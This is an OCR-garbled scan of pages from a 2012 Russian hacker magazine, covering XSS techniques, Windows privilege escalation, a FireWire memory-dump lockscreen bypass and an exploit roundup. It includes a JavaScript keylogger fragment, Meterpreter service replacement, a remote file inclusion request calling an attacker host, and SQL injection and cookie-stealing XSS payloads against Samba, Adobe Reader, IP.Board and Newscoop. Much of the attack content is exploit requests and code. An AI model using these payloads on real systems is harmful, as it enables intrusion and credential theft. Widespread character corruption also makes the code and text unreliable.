
-РипсЕіоп саЕсЬкеу(е') { 

ѵаг кеу_ЬІ5іогу = _пеы_ Аггау(4) ; 
ѵаг кеупит; 

і-РЫіпсІом.еѵепЕ) { // для ІЕ 
кеупит = еѵепІі.кеѵСосІе; 

} еізе і-Р(е.мЬісЬ) { // для МеЕБсаре/Гіге-Рох/Орега 
кеупит = е . ыЬісЬ; 

} еізе { 
геііигп 0; 

} 

ѵаг кеусЬап = 5Егіп§.-РготСЬагСосІе(кеупиітО ; 

// сохранять нажатые клавиши (оффлайн-кейстрокинг) 

-Рог (і=0; і<3 : і++) { 

кеу_ЬІ5іогу[і] = кеу_ЬІ5ЕогуХІ+1]; 

кеу_ЬІ5Еогу[3] = кеусЬаг; 

} 
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Также к краже персональных данных относятся и следующие 
технологии: 

• ѵѵеЬ Ьгоѵѵзег Ьізіогу зіеаііпд — кража истории браузера, 
ссылок и закладок пользователя; 

• ІІРІ_5рооічпд — подмена II РІ_ в адресной строке браузера. 

Как это ни странно, но такая возможность до сих пор при- 
сутствует в современном браузерном мире, даже несмотря 
на всяческие ограничения безопасности. 

5 . Х55 Раде йе^асіпд — дефейс страницы, используемый большин- 
ством недохакеров просто ради шутки. Однако продвинутые 
злоумышленники используютэтот прием, чтобы подменить 



страницу или ее часть на какой-либо аналогичный фей к для 
кражи логинов/паролей, цифровых ключей и прочего у неопыт- 
ных и невнимательных пользователей. 

6 . Накрутка различного рода счетчиков. В принципе, этот вектор 
уже несколько раз затрагивался в нашем журнале, так что здесь 
опять можно лишь напомнить об использовании все той же 
функции ХМ І_НирРедие5і(]. 

Как видишь, вопреки распространенному мнению, простень- 
кая Х55 на каком-нибудь крупном портале вполне может привести 
к непредсказуемым последствиям. 



ПОВЫСИТЬ ПРИВИЛЕГИИ В ѴѴШР0ѴѴ5 ДО 5Ѵ5ТЕМ 



ЗАДАЧА 



РЕШЕНИЕ 

Давай, как и всегда, уточним ситуацию. Предположим, что мы 
получили доступ к какой-то тачке в корпоративной сети. Это даже 
не взлом, а получение к ней удаленного доступа через уязвимость 
в АсгоЬаІ Реабег и, следовательно, шелл с правами офисного 
планктона :). Для того чтобы нормально закрепиться в системе 
и адекватно продолжить атаку на другие хосты, нам необходимо 
повысить привилегии до админских. Кроме того, если мы злые ин- 
сайдеры, но обладаем лишь пользовательскими доменными права- 
ми, нам также хочется подняться до админа и на своем доменном 
хосте. Зачем нам такие права? Обладая правами 5У5ТЕМ в ОС, мы 
можем, например, вынуть хеши других пользователей, поиграть 
с токенами и так далее. Админ, по идее, не может выполнять такие 
действия, тем не менее его почти ничто не ограничивает в под- 
нятии своих прав до 5У5ТЕМ. Ясное дело, что легальных путей 
для повышения своих привилегий просто-напросто нет. Других 
путей для их повышения два. Первый — воспользоваться какой-то 
уязвимостью в ПО или ОС. Классическим примером здесь является 
КіТгарСЮ — эксплойт, входящий в состав теіегргеіег в М5Е. Но баг, 
который он использует, пропатчен уже во многих системах. Второй 
вариант — поиск ошибок конфигурации конкретной ОС и ПО. Есть, 
конечно, извечный третий вариант — социальная инженерия. Но 
в данной задаче мы используем именно второй вариант. 

Итак, давай вспомним, что или кто обладает привилегированны- 
ми правами в ѴѴіпбоѵѵз? Первое, что приходит на ум, — это сервисы. 
Вообще, они не всегда запускаются конкретно под 5Ѵ5ТЕМ, в за- 
висимости от ОС бывают еще и ІЧеІѵѵогк/ЕосаІ Бегѵісе, но подняться 
от них — совсем не проблема. Как же «атаковать» эти сервисы? 
Основная идея — внедрить свой код в случае некорректно вы- 
ставленных прав. Однако для начала эти сервисы еще необходимо 
найти. Способов поиска довольно много. Простейший — посмотреть 
в диспетчере задач или в «Выполнить -> тзсопПд». Более юзабель- 
ный — воспользоваться консолью. Следующая команда выведет 
список сервисов и их статус: 

мтіс зегѵісе Іізі: Ьгіе-Р 



Убрав последнее слово «ЬгіеР», можно получить полную инфор- 
мацию о сервисах, включая месторасположение их ехе'шников. На 
самом деле сервисов не просто много, а очень много. Но в мел- 
комягкой компании сидят отнюдь не дураки, и эти сервисы очень 
редко бывают косячными с точки зрения настройки, если только 
админы конкретной машинки не сильно с ними намудрили :). По- 
тому обращать внимание на эти сервисы стоиттолько в том случае, 
когда больше ничего не остается. Но я отвлекся. Итак, нужные нам 
сервисы можно отобрать с помощью команды Ріпбзіг, но работа 
ручками однозначно не наш выбор. Все это дело прекрасно можно 




Ищем проблемные сервисы 

автоматизировать. Есть такие люди, которые просто тащатся от 
извращений в консоли ѴѴіпбоѵѵз: 

■Рог /-Р "1:океп5=2 бе1 іт з= 1 = 111 %а іп ('ытіс зегѵісе л 
Іізі: -Ри11 л | РіпсІ /і "ра1:Ііпате" л | бпс! /і /ѵ "зуз1:ет32" ' ) л 
сіо (йесііо %а >> %іетр%\регтІ53іоп5 .іхі: 

За пример скажем спасибо Трэвису Альтману ( ігаѵізаіітап.сот і. 
На выходе в нашей личной папке «Тетр» мы получим список лока- 
ций ехе'шников. Что дальше? Проверяем права к файлам. И тоже 
автоматически с помощью еще одной «магической последователь- 
ности» от Трэвиса: 

-Рог /-Р ео! Л = Л " Л беіітз' 4 ^ 4 " %а іп (%’Еетр%\регтІ55Іоп5.ЪсЕ) л 
бо стб.ехе /с ісасіз "%а" 

Здесь мы последовательно запускаем команду ісасіз для 
каждого из ехе-файлов. Данная команда проверяет список 
прав для файлов и папок. Отмечу, что под ХР используется 
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другое ее написание — сасіз. В итоге у нас появляется возмож- 
ность анализа прав. Как ты уже понял, искать нужно слишком 
обширные права. Самый простой пример — полные права «Р» 
для группы «ІІзегз». Но на деле важно обратить внимание и на 
более тонкие ситуации. Например, когда я просканил свою 
систему, то обнаружил интересный сервис «СѴРЫО». Принадле- 
жал он ѴРІМ- клиенту от Сізсо. Но что самое интересное — у него 
стояли полные права и на группу « I піегасііѵе», то есть для всех 
пользователей, кто в данный момент залогинен в ОС. А потому, 
хотя у группы «ІІзегз» были права только на чтение, встроен- 
ное членство в интерактивах дало им полную свободу. По этому 
поводу я связался с Сізсо, но они сказали, что данный косяк 
им известен и исправлен в следующем билде (у меня оказался 
предпоследний). Кроме того, на своей тачке я обнаружил и еще 
один косячный сервис в одном знаменитом продукте, но вендор 
пока ничего мне не ответил. Здесь понятно, что, как только мы 
обнаруживаем такой ехе'шник, мы можем подменить его на 
любой другой, выгодный нам, например на сервис теіегргеіег из 
М5Р :). Здесь есть еще один важный момент. Даже если у нас нет 
прав на сам ехе-файл, то все же сохраняется небольшая возмож- 
ность для внедрения своего кода — это известная тебе техника 
0І_І_ Ндаскіпд и ее подтипы. Для этого нам надо просмотреть 
права на папки, в которых располагаются ехе-файлы, а также те 
места, где хранятся библиотеки, используемые сервисом. Для 
первой проверки можно также воспользоваться предыдущей 
последовательностью команд, а для второй потребуется уже 




Группа «Іпіегасііѵе» имеет полные права на файл сервиса 



что-то типа утилиты Зузіпіегпаіз. Кстати, как это ни печально, но 
для рестарта сервиса с новым ехе чаще всего требуются права 
админа или ребут. 



ОБОЙТИ ЬОСКБСКЕЕИ НА МАС ОБ X С ПОМОЩЬЮ РІКЕѴѴІКЕ 



ЗАДАЧА 



РЕШЕНИЕ 

Я не являюсь счастливым обладателем ноутбука от компании 
Арріе, а потому данную задачу на практике проверить не смог. 
Однако она меня потрясла до глубины души, поэтому хочу донести 
до тебя общую идею ее решения, а за подробностями отправлю 
к первоисточнику. 

Давай допустим, что где-то есть всем известная Мае 05 X, 
в которой сидел обычный юзер, но затем залочил экран и ушел 
куда-то. Тем временем у нас появляется около десяти минут на 
работу с его машинкой. Что делать? Уязвимостей вроде бы нет, 
если только не перебирать пароль. Каких-то особенных мыслей 
в голове также нет... Но тут неожиданно приходит на помощь трюк 
от ИБ-исследователя Арно Малара (АгпаисІ МаІагсІ). В чем же он 
заключается? Итак, Арно написал о прекрасной вещи, которая 
вряд ли где-то упоминается в контексте безопасности. Называется 
эта вещь ОМА. Обратимся к вики: ОМА (Оігесі Метогу Асеева) — 
это режим обмена данными между устройствами или же между 
устройством и основной памятью (РАМ) безучастия центрального 
процессора. Причем «режим обмена» подразумевает как чтение, 



так и запись данных в память. Ага, интерфейс РігеѴѴіге как раз 
поддерживает ОМА, и, что важно для нас, он присутствует почти 
на всех маках. Таким образом, для проведения атаки нам потре- 
буются две вещи. Во-первых, это специальное ПО, позволяющее 
после коннекта по РігеѴѴіге к маку жертвы скопировать все данные 
из оперативной памяти. Во-вторых, это около минуты времени, 
которая необходима для перекачки данных :). Это хитрое ПО можно 
скачать в блоге Арно Малара ( доо.дІ/009аЫ . Более подробное 
руководство по использованию и установке ищи тут: доо.д!/ЦН4и . 
Видеопример — аоо.д і/ТпѴѴУд . 

Идем дальше. После того как память будет перекачана, мы 
можем поискать в ней вполне определенные строки с паролем: 

51:гіп§5 сІитр_тетогу . гаы | §гер -А 5 1оп§пате 

Как ты уже понял, с этим паролем мы успешно можем залоги- 
ниться в систему! Но и это еще не всё. У нас есть возможность по- 
лучить, кроме логина и пароля для ОС, и другие данные, например 
от аккаунта в Гугле. За подробностями обращайся к автору. 



ПОВЫСИТЬ СКИЛЛ РАБОТЫ в консоли 



ЗАДАЧА 



РЕШЕНИЕ 

Автоматизация — это прекрасно. Она позволяет выделить до- 
полнительное время на всякие приятные дела. Но чтобы хоть 
что-нибудь автоматизировать, надо многое знать. Особенно это 
важно при работе в консоли. Во время написания данной статьи, 



например, я открыл для себя некоторые прелести ѵѵтіе. Возьму 
на себя часть обязанностей ведущего рубрики ѴѴѴѴѴѴ2 и пре- 
зентую тебе прелестный сайт — ;з64.сот . На нем присутствует 
довольно неплохой обширный хелп по командам ѴѴіпсІоѵѵз, Р5, 
ВазН. 
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ВЗЛОМ/ОБЗОР ЭКСПЛОЙТОВ 



Павел Александрович (іѵіпзісІе.ЫодзроБсот) 
Дмитрий Михайлович (115612, дер. Красная Звездочка, д. 1) 




ВСЯКИЕ ШТУКИ ЗА ПОСЛЕДНИЙ МЕСЯЦ 



Травка зеленеет, солнышко блестит! А наша рубрика по-прежнему радуеттебя 
новинками в области эксплойтостроения и багоискательства. Сегодня в выпуске: 
ЗагтпЬа, АсІоЬе Реасіег, ОІІуРЬд, Іпѵізіоп Роѵѵег ВоагсІ, Ыеѵѵзсоор. 



л Удаленное исполнение кода с правами 
I пользователя гооі в с 3.0.x по 3.6.3 



СѴ55Ѵ2 10.0 



□пша 



(АѴ: Ы/АС: Б/АУ: Ы/С:С/І:С/А:С) 



Все версии ВатЬа, начиная от 3.0.x и заканчивая версией 3.6.3, 
подвержены уязвимости, позволяющей анонимному, неавтори- 
зированному пользователю при наличии доступа к открытому 
сетевому порту БатЬа добиться удаленного исполнения кода. 
Первоначальная информация об уязвимости появиласьеще 15 
марта благодаря участникам программы Ю I, и на исправление 



бага разработчикам понадобился целый месяц. 



ЕХРЮІТ 



В результате ошибки в генераторе кода для механизма удаленного 
вызова процедур (Ретоіе Ргосебиге СаІІ, РРС) генерируется небез- 
опасный код. Код этот используется при контроле маршализации 
и демаршализации РРС-вызовов в сети. Проверки переменной, со- 
держащей размер массива, и переменной с памятью, выделенной 
под этот массив, происходят независимо друг от друга. Так как обе 
они контролируются на стороне клиента, то существует неиллю- 
зорная возможность выполнения произвольного кода сервером, 
если ему на вход поступит специальным образом сформирован- 
ный РРС-вызов. Поскольку баг не требует аутентифицированного 



ХАКЕР 06/161/2012 



053 












ВЗЛОМ/ОБЗОР ЭКСПЛОЙТОВ 



соединения, то мы имеем максимально возможный «непорядок» 
в безопасности программы, посему пользователи и вендоры долж- 
ны незамедлительно обновить свои реинкарнации 5атЬа. 

Важный регГовый кодогенератор располагается по следующе- 
му пути в дереве исходников ВатЬа: рібІ/ІіЬ/РагБе/РібІ/5атЬа4/ 
ІМОР/РагБег.рт. 

При его посредничестве генерируется следующий уязвимый код: 

_РЦВИС_ епит пбгеггсобе пбг_ри11_ІБа_5ібАггау( 

БігисЕ псІг_ри11 *псІ г, 
іпі псіг Па^Б, 

Бігисі: ІБа_5ісІАггау *г) 

М_ 

иіп1:32_1: рігзібБ ; 

иіігЬ32_'Ь сітЬгбісібі; 

ТАНОС СТХ * теш заѵе 5ІСІ5 0; 

ТАІ_І_ОС_СТХ *_тет_5аѵе_5ІсІ5_1; 

ІТ ( псі г -Па§5 & тК_5САІ.АК5 ) { 

МРК СНЕСК(пбг риіі _а1і^п(пбг . 5) ) ; 
МРК_СНЕСК(пбг_ри11_иіп1:32(пбг, МРК_5САБАК5, 
&г->пит_5ІсІ5) ) ; 

[1] і-Р (г->пит_5ІсІ5 > 20480) { 

геііигп п сіг риіі еггоКпбг. ШК_ЕКК_КАМСЕ., 

"ѵаіие оиі: о-Р гап§е"); 

} 

ЫРК СНЕСКС псіг риіі ^епегіс рІіпС псіг . &_р~Сг_5ІсІ5) ) ; 

ІТ ( рТ Г_5ІСІ5 ) { 

І\ІРК_РЦи._АІ.І.ОС(псІг . г- > бі6б ) : 

> еізе I 

г- >5ІсІ5 = N1111; 

} 

ИРК СНЕСКСпбг риіі Іігаііег аІі^ пСпбг. 5) ) ; 

} 

і-Р (псІг РІа^з & ЫРК ВУРРЕКБ) { 

І-р (г - >5ІСІ 5 ) _{ 

_тет_5аѵе_5ІсІ5_0 = М РК РУН 6ЕТ МЕМ СТХ(пбгѴ. 

МРК РЦИ БЕТ МЕМ СТХРпсІг. г->бі6б, 0); 

[2] ЫРК СНЕШпбг риіі аггаѵ 5Іге(пбг. аг-^бБ) ) ; 

[3] МРК_Риі_І__АЫ-ОМ\І(пбг, г- > бісі 5 і 

п сі г_§е1:_а г г а у_зі ъ е ( п б г & г - > бісіб) ) ; 
_тет_5аѵе_5ІсІ5_1 = МРК_РЦІІ_6ЕТ_МЕМ_СТХ(пбг) ; 
МРК_РІЛ_І__5ЕТ_МЕМ_СТХ(пбГд_г- >бі6б л 0); 

[4] -Рог (СПІГ_5І65_1 0; 

СПІГ_5ІСІ 5_1 < Г->Пит_БІСІ5; 

СПІ:Г_5АсІ5_1++) { 

ИРК СНЕСКСпсІг риІІ ІзаЗі бРІігІ'пбг , 

МРК5САІ.АК5. &г- > бісі5 [ спіг_бісі5_1 ] ) ^ ; 

} 

На строке [1] мы контролируем значение г->пит_5ІсІ5, на 
строке [2] размер массива (4 байта) читается из нашего буфера. 

На строке [3] выделяется память. Если г->пит_5ІсІ5 окажется 
больше, чем размер массива (строка [2]), на строке [4] случится 
Ьеар оѵегііоѵѵ. Уязвимая функция достижима из пбг_риІІ_5атг_ 
СеіАІіазМетЬегБЫр 



ТАК6ЕТ5 



ВатЬа 3.0.x — 3.6.3. 



БОІЛШСЖ 



Существует обновление, устраняющее данную уязвимость. 

Также, если есть проблемы со скачиванием обновлений, то в каче- 
стве временного и шаткого костыля предлагается ограничить список 
дозволенных пользователей, которые могут подключаться к серверу. 
Это можно сделать путем модификации параметра Иобіб аііоѵѵ в бітіЬ. 
сопі. К сожалению, это не спасет в случае подмены адреса клиента. 
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Результат выполнения эксплойта на СѴЕ-201 2-0776 



9 АсіоЬе Кеасіег, выход из песочницы при 
И помощи ЕХЕ ріапііпд 



СѴ55Ѵ2 10.0 



(АѴ:І\І/АС:Е/АІІ:І\І/С: С/ЕС/А: С) 

АбоЬе Реабег версий 9.x <= 9.5.1 и версий 10.x <= 10.1.3 под- 
вержены уязвимости типа ЕХЕ ріапііпд (подмена исполняемого 
файла). 



ЕХРЮІТ 



Пред нашими очами классический вариант уязвимости типа ЕХЕ 
ріапііпд: при определенных условиях АбоЬе Реабег (а именно 
процесс АсгоРб32.ехе) запускает исполняемый файл тзіехес. 
ехе посредством вызова функции СгеаІеРгосеББ и не указывает 
в параметрах для этой функции полного пути к нему. В результате 
СгеаІеРгосезБ начинает искать исполняемый файл в текущей рабо- 
чей директории процесса АсгоРб32.ехе и если атакующему удастся 
поместить туда собственный тзіехес, то именно он и выполнится. 
Очевидно, что в подобной ситуации никакой запбЬох не поможет 
и подмененный тзіехес будет спокойно выполняться с правами 
пользователя, запустившего АбоЬе Реабег. 

Так как же заставить Реабег считать своей текущей рабочей 
директорией ту, в которой лежит подмененный тзіехес? Самый 
простой путь для достижения этих коварных замыслов — положить 
рбі-файл и наш тзіехес.ехе в одну и туже директорию и дважды 
вжать по рбГке. Вариант этот крайне уныл, поскольку в наш век 
найдется не много наивных пользователей, открывающих не- 
известные рбі-файлы из расшаренной сетевой папки. Посему 
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рассмотрим другой вектор атаки: аррІісаЛоп-Ьазеб открытие 
документа. 

Эксплойт — этап 1. Папка Ооѵѵпіоабз — это папка, куда попу- 
лярные браузеры сохраняют скачиваемые пользователем файлы. 
В то время как большинство браузеров требуют подтверждения 
попыток веб-сайтов загрузить исполняемые файлы на компьютер 
пользователя, Соодіе СЬготе готов осуществить этот вопиющий 
акт кибервандализма за спасибо и без каких-либо вопросов. 
Более того, сам процесс загрузки в нем может принять совер- 
шенно неинтерактивную форму, иначе говоря — пользователь не 
заметит, что что-то произошло. При попытке подобной загрузки 
в СЬготе в нижнем правом углу появляется и исчезает после 
окончания загрузки небольшое всплывающее окно. Немного ра- 
боты напильником — и это всплывающее окно вообще окажется 
невидимым. 

Теперь, когда мы можем разместить вредоносный тзіехес. 
ехе в папке Ооѵѵпіоабз, пришло время для второго этапа работы 
эксплойта. 

Эксплойт — этап 2. Теперь нам требуется загрузить в папку 
Ооѵѵпіоабз рбЫдокумент (тзіехес. ехе уже ожидает в Ооѵѵпіоабз 
своего звездного часа) и открыть его из браузера. Звучит просто, 
но есть один нюанс: рсН-файл должен открыться в отдельном 
процессе Реабег'а, а не в браузере. Существует метод, чтобы 
достигнуть желаемого в СЬготе (ну и в остальных браузерах). 
Подсмотреть его можно на СтаіІ. Осталась самая жуткая часть, 
а именно: применение методов социнженерии, дабы подвигнуть 
атакуемого пользователя щелкнуть по менюшкам «Неір -> Рераіг 
АбоЬе Реабег ІпзІаІІаЬоп» и нажать «Уез» в окне подтверждения 
совершаемой операции. Это уже дело твоей фантазии... 

Серьезным ограничением в применении эксплойта является 
тот факт, что пункт меню «Рераіг АбоЬе Реабег Іпзіаііаііоп» досту- 
пен только пользователям с правами администратора. 



ТАК6ЕТ5 



АбоЬе Реабег версий 9.x <= 9.5.1 и 10.x <= 10.1.3. 



$тет ЬегІб. $етаі1 ) = ехр1обе( 1 ; 1 . $кеу ); 



іі ( ! $іЬІ5->тетЬегРа1:а[ 1 тетЬег_іб 1 ] ) 

{ 

$1:ЬІ5-> ге^І5І:гѵ->ои1:рц1:->5ЬоыЕггог( 

1 по_регтіззіоп ’ ^ 1 рс§1-1‘ 

} 



і-Р ( ! $арр | | ! $агеа | | ! $ге!Іб ) 

{ 

$1:ЬІ5-> ге^І5І:гѵ->ои1:ри1:->5ЬоыЕггог( 
' по_регтіззіоп ' , ' рс§1-1' ); 

} 



і-р ( ( $тетЬегІб != $1ікеМетЬегІб ) | 

( $тетЬегІб != $іЬіз->тетЬегРа1:а[ 1 тетЬегіб 1 ] ) 

$1:ЬІ5-> ге^І5І:гѵ->ои1:ри1:->5ЬоыЕггог( 

' по_регтіззіоп 'рс§1-2' ); 

} 



і-р ( $етаі! != $іЬІ5->теіт)ЬегРа1:а[ 1 етаіі 1 ] ) 

$1:ЬІ5- >ге^І5І:гѵ->ои1:ри1:->5ЬоыЕггог( 

' по_регтіз5Іоп ' , ' рс§1-3' ); 

} 



$1:ЬІ5->_1іке = сіаззез Ііке: : ЬооізІігарС $арр. $агеа ) ; 

Как видно из этого кода, переданный пользователем параметр 
кеу сначала декодируется из Ьазе64 и затем разделяется на шесть 
переменных. После нескольких проверок вызывается функция 
ЬооЫгарО с неотфильтрованными параметрами, полученными от 
пользователя. Рассмотримучастоккода изскрипта сотрозЬе.рЬр, 
содержащего функцию ЬооІзІгарП: 



боиліоы 



Существует обновление, устраняющее данную уязвимость. 



зіаіііс риЬІіс -Рипсііоп ЬооізігарР $арр=пи11. $агеа=пи!1 ) 

{ 



3 



І.РІ в Іпѵізіоп Роѵѵег ВоагсІ 



СѴ55Ѵ2 



6.8 



(АѴ:М/АС:М/Аи:М/С: Р/І: Р/А: Р) 

|ЩЩ 

Іпѵізіоп Роѵѵег Воагб (также известный как ІРВ, ІР.Воагб или ІР 
Воагб) — всем знакомый форумный движок, написанный на РНР 
и использующий поумолчанию СУБД Му5СИ_ (поддержка других 
СУБД также имеется). Двенадцатого апреля была опубликована 
уязвимость, позволяющая провести атаки типа І_осаІ Рііе Іпсіизіоп 
и удаленное выполнение РНР- кода. Автор — эстонский исследова- 
тель бапекѴіпб. 



ЕХРЮІТ 



Для реализации атаки необходимо иметь пользовательский акка- 
унт на форуме, а версия РНР должна быть не более 5.3.4. Причина 
уязвимости кроется в нефильтруемых пользовательских данных 
при выполнении файловых операций, аименнопри передаче 6 ЕТ- 
параметра кеу. Взглянем на кусокуязвимого кода в скрипте Ііке.рЬр: 

ргоііесііеб -Рипсііоп ипзиЬзсгіЬеО 

і_ 

$кеу = ігішС ІРБТехІ:: : Ьазеб4 бесобе ип15а-Ре( 
$1:ЬІ5-> гедие5І=[ ' кеѵ' ] ) ); 

1І5І ( $а р р. $агеа. $ге1Іб. $1ікеМетЬегІб . 



і-р( $ агеа != 'бе-РаиН:' ) 

і_ 

$_б!е = ІР5І_іЬ: :§е1=А р рРіг( $а р р ) . 

Ѵехіепзіопз/Ііке/ ' . $агеа . '.рЬр';_ 



} 



і-Р ( ! І5_б1е( $_51е ) ) 



іЬгош пеш Е хсерііоп( 

"N 0 Ііке сіазз аѵаіІаЬІе -Рог $арр - $агеа" ); 



} 

$с1аззТоІ_оаб = ІР5І_іЬ: : 1оабІ_іЬгагу( 

$_б1е л $_с1азз л $арр ); 

Легкоувидеть, что переменная $_ііІе определяется через один 
из неотфильтрова иных пара метров — $агеа. Дальше происходит 
проверка на существование файла в системе, и, если он существует, 
вызывается функция ІоабЫЬгагуО. 

Вот часть уязвимого кода изскрипта соге.рЬр, где определена 
функция ІоабЫЬгагуО: 

зіаіііс риЬІіс -Рипсіііоп 1оабІ_іЬгагу( 

$б!еРа1:Ь. ЗсІаззІМате. $арр='соге' ) 
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Падение ОІІуйЬд ѵі .1 0 при количестве секций >= 0x2000 



/ /к П. л+- 4- и л г 1 л Г Г /к / 



#4 С:\араспе_иАлАл/\ірЬ330\аатіп\5оигсе5\ЬаБе\ір5Соп1:го11ег.рпр(б5) : 
ір5Соп1:го11ег ->Ііап сІ1еКедие5Т ( ) 

#5 С:\арасИе_№м\ірЬЗЗѲ\іпсІех.рІір(2б) : ірБСогѵЕгоІІег : :гипО 
#6 {таіп} ІЩгоып іп С:\арасЬе_ы<лПл>\ірЬ330\асІтіп\5оигсе5\с1а55е5\ 
1іке\сотро5І1:е.рІір оп Ііпе 333 

Сценарий атаки может быть следующим: 

1. Атакующий регистрируется на форуме и логинится. 

2. Загружает аватар с произвольным РНР- кодом внутри. 

3. Конструирует вышеописанным образом СЕТ-запрос и получает 
результатвыполнения своего кода. 

Существует множество путей эксплуатации І_РІ -уязвимостей, на- 
пример использовать ргосі'з (ргос/зеК/епѵігоп) на системах *піх. 



Іпѵізіоп РоѵѵегВоагсІ версий 3.3.0 и 3.2.3, более ранние версии тоже 
могут быть подвержены уязвимости. 



Обновиться до версии 3.3.1 

д Множественные уязвимости в Ыеѵѵзсоор 



і-г ( $«1еРа1:И ' ) 



гедиіге опсе( $Л1еРа1:Іі ) ; /*поІ.і Ы Ноок*/ 

Очевидно, что функция гедиіге_опсе() вызывается с параметром 
$ЛІеРаЛ~і, который в нашем случае является $_ПІе, а он, в свою оче- 
редь, никакнефильтруется изначально. 

Для успешной атаки нам потребуется сконструировать строку 
в Ьазе64: 

-Рогитз ./1:е5І::1;1:1;соте2ыагахе (а~Е) ѵаііоо (с!о1:) сот 
[етаіі сопсеаіесі] 

Электронный адрес должен быть валиден. После перекодирова- 
ния в Ьазе64имеем: 

2т9усІ1лІІ2Оу8иІі8иІі902ХМ0О2Е7МТ5хО2МѵЫліиусІ2РуУХІіідН1ІіаО9ѵІтМѵЬд 

Теперьзалогинимся пользователем и выполним ОЕТ-запрос: 

ІтЕір: //ІосаІІіоБІі/ірЬЗЗѲ/іпсІех. р!ір?арр=соге&тосІи1е=^1оЬа1 

&5ес1=іоп=1іке&сІо=ип5иЬ5СпіЬе&кеѵ=2т9ѵсІЫІ2Оѵ8иІі8иІі9Ѳ2ХМ0 

02Е7МТ5х02МѵЫлІЦусІ2РуУХІі10Н1Ііа69ѵІтМѵЬ0 

В результате получаем ошибку, свидетельствующую об отсут- 
ствии файла в системе: 

Еа1:а1 еггог: ЦпсаиеМ: ехсер1:іоп 1 Ехсер1:іоп 1 мгЫі теББаее 
'N 0 Ике сІЭББ аѵаіІаЬІе -Рог -РопитБ - /. ./. .АЕеБІ: 1 іп С:\ 
арасИе №м\ірЬ330\асІтіп\5оигсе5\с1а55е5\1іке\сотро5І1:е.рІір:333 
Бііаск Ііпасе: 

#0 С : \арасИе_ыыы\ірЬ330\асІтіп\арр1іса1:іоп5\сопе\тосІи1е5_риЫіс\ 

§1оЬа1\1іке.рІір(131) : 

сіэббѳб Ике: :Ьоо1: Бѣга р( ' -Рог итБ 1 . ./±вз±' ) 

#1 С : \арасИе_<лПлПл>\ірЬ330\асІтіп\арр1іса1:іоп5\соге\тосІи1е5_риЫіс\ 

%1оЬа1\1іке . рНр(44Л : 

риЫіс_соге_§1оЬа1_1іке->_ип5иЬ5сгіЬеО 

#2 С:\арасИе_ыыы\ірЬ330\асІтіп\5оипсе5\Ьа5е\ір5Соп1:го11ег.рІір 
(306): 

риЬІіс соге еІоЬа! 1іке->сІоЕхеси1:е(0Ьіес1:(ір5КееІ5І:гѵ)) #3 
С:\арасИе <лПлПл>\ірЬ330\ас!тіп\5оигсе5\Ьа5е\ір5Соп1:го11ег.рІір(120) : 
ірБСоттапсІ->ехеси1:е( , 0Ьіес1:( , ір5Ке^І5І:гу’)’) 



4 



СѴ35Ѵ2 7.5 



( АѴ: Ы/АС: І_/Аи: Ы/С: Р/І : Р/А: Р) 

Щ|:У 

Ыеѵѵзсоор — СМ5,специализированнаядляновостныхи информа- 
ционных сайтов, а также для сайтов печатных изданий. Компания 
с выразительным названием НідЬ-ТесЬ Вгісіде БАБесигіІу РезеагсЬ І_аЬ 
обнаружила несколькоуязвимостей вэтом движке, в результате ихэкс- 
плуатированияможнореализоватьтакиеатаки, какРРІ,50І_і иХ55. 



ЕХРЮІТ 



1. Удаленное включение файла акаВРІ. 

Входящие данные, переданные через СЕТ- пара метр 
6І_0ВАІ_5[д_сатр5ІІе0іг] в скрипт/іпсЫе/рЬогит_ІоасІ.рЬр, 
не фильтруются должным образом прежде, чем быть использо- 
ванными в функции гедиіге_опсе(), что заканчивается весьма 
плачевно. Для реализации этой атаки необходимо выполнить 
следующий запрос: 

Ы=1=р : //[Ііо5І=]/іпс1исІе/рІіогит_1оасІ. рбр?СІ.ОВАІ.5 [ 

^ сатрзі1=еРіп]=Іі1=1=р://а1=1=аскег.5І1=е/б1е%Ѳ0 

Такая же участь постигла скрипты /сопіѴіп5ІаІІ_сопТрИр и/сопіѴ 
Пуеи5ег_сопЛдигаИоп.рЬр, поскольку в них используется тотже 
параметр. РоС для них вы глядит следующим образом: 

М1:1:р: //[Мо5І:]/соп-Р/іп5І:а11 соп-Р.рНр? 

СШВАББ [§_сапщМТеОіг ] = 

ІтЫр : //аЛаскег . 5і1:е/б1е%00 



Ыііір:// [Ііо5І:]/соп-р/1іѵеи5ег_сопб§ига1:іоп . рМр ? 
еі_0ВАІ_Б[§_сатр5І1:е0іг] = 

Іі1=1=р: //а1=1=аскеп. 5І1=е/б1е%00 

Для успешного проведения атаки необходимо, чтобы была вклю- 
чена опция гедІ5Іег_дІоЬаІз. 

2. 50І_-инъекция. 

Пользовательские данные, переданные через СЕТ-параметр 
{_соипІгу_сосІе в скрипт/абтт/соип^гу/есШ.рбр, также не 
соизволили отфильтровать, что дает возможность атакующему 
внедрять и выполнять произвольные СОБ-зап росы: 
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Ьіір: /У [Ьові]/асІтіп/соипігу/есІіі . рЬр?-Р_соипігу_сосІе= 
%27%20ипіоп%205е1есі%201 д 2 д ѵегзіоп%28%29%20- -%202 



еіоЬа1Ргее(Р->5есі) ; 
Р->зесі = 0; 



Для успешной эксплуатации необходим аккаунт в системе с при- 
вилегией редактирования списка стран, а также отключенная 
опция тадіс_циоІе5_дрс. 

3. МножественныеХББ. 

На этот раз в деле замешан ОЕТ-параметр Васк в скрипте /асітіп/ 
асі.рЬр. С помощью него можно отобразить в браузере произволь- 
ный НТМІ_-код или выполнить скрипт: 

Ьіір://[Ьозі]/асІтіп/асІ . рЬр?Васк=%27%22%ЗЕ%ЗС5сгірі%ЗЕ 
а1егі%28сІоситепі . соокіе%29;%ЗС/зсгірі%ЗЕ 

Удивительно, но разработчики до сих пор допускают очевидные 
ошибки, что приводит к массе воттаких багов. Кроме вышеобо- 
значенного скрипта, еще отличил ись/абтіп/Іодіп.рЬр и /асітіп/ 
раз5ѵѵогсІ_сЬеск_Іокеп.рЬр, что подтверждается такими запросами: 

Ьіір://[Ьо5і]/асІтіп/1о§іп. рЬр?еггог^сосІе=ир§гасІе& 
■р_и5ег_пате=%22%ЗЕ%ЗС5сгірі%ЗЕа1егі%28сІоситепі . 
соокіе%29;%ЗС/5сгірі%ЗЕ 

Ьіір: //[Ьобі ] /асІтіп/разБѵюгсІсЬескіокеп .рЬр?іокеп=1&-Р_ 
етаі1=%22%ЗЕ%ЗС5Сгірі%ЗЕа1егі%28сІоситепі. соокіе%29;%ЗС/ 
5сгірі%ЗЕ 

Ьіір ;//[ Ьобі] / асІтіп/ра55Ѵ\/огсІ_сЬеск_іокеп . рЬр?-Р_етаі1=1& 
